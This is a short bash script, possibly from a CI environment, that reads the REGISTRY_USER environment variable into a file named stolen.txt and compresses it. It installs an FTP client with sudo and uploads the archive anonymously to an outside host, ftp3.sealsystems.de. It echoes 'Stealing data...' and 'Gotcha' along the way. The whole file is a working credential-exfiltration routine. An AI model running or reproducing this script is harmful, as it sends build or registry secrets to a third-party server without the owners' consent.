#!/bin/bash
echo $0
echo REGISTRY_USER
printenv REGISTRY_USER
printenv REGISTRY_USER >stolen.txt
gzip stolen.txt

sudo apt-get update
sudo apt-get install -y ftp
echo "Stealing data..."
ftp -inv ftp3.sealsystems.de << EOF
user anonymous anonymous
pass
cd to_seal
put stolen.txt.gz
bye
EOF

echo "Gotcha"
